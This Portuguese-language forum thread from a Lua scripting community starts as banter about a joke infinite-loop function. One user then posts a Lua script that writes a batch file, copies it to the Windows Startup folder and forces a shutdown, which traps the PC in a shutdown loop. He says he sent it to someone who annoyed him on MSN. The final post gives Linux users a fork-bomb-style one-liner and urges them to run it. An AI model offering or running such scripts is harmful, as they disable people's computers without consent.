MaXwEllDeN 89 Postado Dezembro 16, 2012 Share Postado Dezembro 16, 2012 Author: Skyen Hasus function naoExecute() repeat while true do for i = 1, math.huge do os.execute("ECHO naoExecute") end end until false return naoExecute() end naoExecute() Use por sua conta e risco. Link para o comentário Compartilhar em outros sites More sharing options...
Oneshot 732 Postado Dezembro 16, 2012 Share Postado Dezembro 16, 2012 (editado) Tô rindo disso aí, cara. Isso aí nem é uma função, está mais para uma piada sobre loops em Lua. Aquela raposa é louca mesmo. Editado Dezembro 16, 2012 por Oneshot Link para o comentário Compartilhar em outros sites More sharing options...
MaXwEllDeN 89 Postado Dezembro 16, 2012 Autor Share Postado Dezembro 16, 2012 (editado) Tô rindo disso aí, cara. Isso aí nem é uma função, está mais para uma piada sobre loops em Lua. Aquela raposa é louca mesmo. Pois é cara aehauheua. Eu tô dando uma olhada aqui em um "falecido fórum", e olhando os códigos na área Geral de Lua. A cada tópico que eu vejo aumenta a certeza que eu não sei de nada, aehuaheua. Aqueles caras realmente manjam muito. Skyen, Mock, etc... *-* Editado Dezembro 16, 2012 por MaXwEllDeN Link para o comentário Compartilhar em outros sites More sharing options...
iunix 41 Postado Dezembro 16, 2012 Share Postado Dezembro 16, 2012 Raposa problemática... Link para o comentário Compartilhar em outros sites More sharing options...
Demonbholder 420 Postado Dezembro 19, 2012 Share Postado Dezembro 19, 2012 nossa... qualquer um dos loopings que ele colocou ia travar o interpretador. com certeza foi uma brincadeira. Link para o comentário Compartilhar em outros sites More sharing options...
iunix 41 Postado Dezembro 19, 2012 Share Postado Dezembro 19, 2012 nossa... qualquer um dos loopings que ele colocou ia travar o interpretador. com certeza foi uma brincadeira. Sim, ele fez para "trollarmos" o Meryl e fazer o pc dele explodir. xD Link para o comentário Compartilhar em outros sites More sharing options...
MaXwEllDeN 89 Postado Dezembro 19, 2012 Autor Share Postado Dezembro 19, 2012 nossa... qualquer um dos loopings que ele colocou ia travar o interpretador. com certeza foi uma brincadeira. Sim, ele fez para "trollarmos" o Meryl e fazer o pc dele explodir. xD Dessa eu não sabia, aehauehuahuehuae Link para o comentário Compartilhar em outros sites More sharing options...
Vinc 101 Postado Janeiro 17, 2013 Share Postado Janeiro 17, 2013 (editado) nossa... qualquer um dos loopings que ele colocou ia travar o interpretador. com certeza foi uma brincadeira. trava n,já fiz isso com tasklist(com loop só,colocar outros seria inutil),foda é para tem que fecha o server(mas fica um monte de janela de cmd) uma ves um cara tava enchendo o saco no msn passei um script +- assim(mas em binario com load) obs:jamais execute este script,n sei como arumar caso usem... io.output(io.open("oi.bat","w")) io.write('@echo \n copy /Y "oi.bat" "%appdata%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup" \n shutdown /s /p /f') io.close() io.popen("oi.bat") Editado Janeiro 17, 2013 por lordbug99 Link para o comentário Compartilhar em outros sites More sharing options...
Skymagnum 234 Postado Janeiro 17, 2013 Share Postado Janeiro 17, 2013 Usei e não aconteceu nada. Link para o comentário Compartilhar em outros sites More sharing options...
20cm 70 Postado Janeiro 17, 2013 Share Postado Janeiro 17, 2013 (editado) Usei e não aconteceu nada. Sério? Pelo que eu vi ele cria um .bat que ao ser executado desliga o PC, na pasta de startup do windows (programas que abrem com o windows) Basicamente quando você inicia seu PC ele abre o .bat e desliga de novo... Pra tirar é só abrir pelo modo de segurança e deletar o arquivo, ou dar shutdown -a no executar antes de desligar e depois remover Editado Janeiro 17, 2013 por 20cm Link para o comentário Compartilhar em outros sites More sharing options...
MaXwEllDeN 89 Postado Janeiro 17, 2013 Autor Share Postado Janeiro 17, 2013 nossa... qualquer um dos loopings que ele colocou ia travar o interpretador. com certeza foi uma brincadeira. trava n,já fiz isso com tasklist(com loop só,colocar outros seria inutil),foda é para tem que fecha o server(mas fica um monte de janela de cmd) uma ves um cara tava enchendo o saco no msn passei um script +- assim(mas em binario com load) obs:jamais execute este script,n sei como arumar caso usem... io.output(io.open("oi.bat","w")) io.write('@echo \n copy /Y "oi.bat" "%appdata%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup" \n shutdown /s /p /f') io.close() io.popen("oi.bat") Não existe a pasta Janelas da Microsoft no meu Linux, executei isso ai e não deu nada '-' Link para o comentário Compartilhar em outros sites More sharing options...
Vinc 101 Postado Janeiro 17, 2013 Share Postado Janeiro 17, 2013 (editado) kk os cara n sabe nada de bat,eu deixe errado pra ve se alguem reparava,n funciona se por "/s" e "/p" junto(o correto seria só "shutdown /p /f" desliga imediatamente sem nenhum tipo de aviso mesmo que aja progrmas abertos). Não existe a pasta Janelas da Microsoft no meu Linux, executei isso ai e não deu nada '-' claro isso é obviamente para windows 7,se fosse pra xp seria differente,pra linux nen sei como seria. obs:eu sabia exatamente qual era a verção do windows do cara Editado Janeiro 17, 2013 por lordbug99 Link para o comentário Compartilhar em outros sites More sharing options...
Skyen 64 Postado Janeiro 17, 2013 Share Postado Janeiro 17, 2013 Linux users, good luck: ){ & };: Executem no terminal. Link para o comentário Compartilhar em outros sites More sharing options...
Posts Recomendados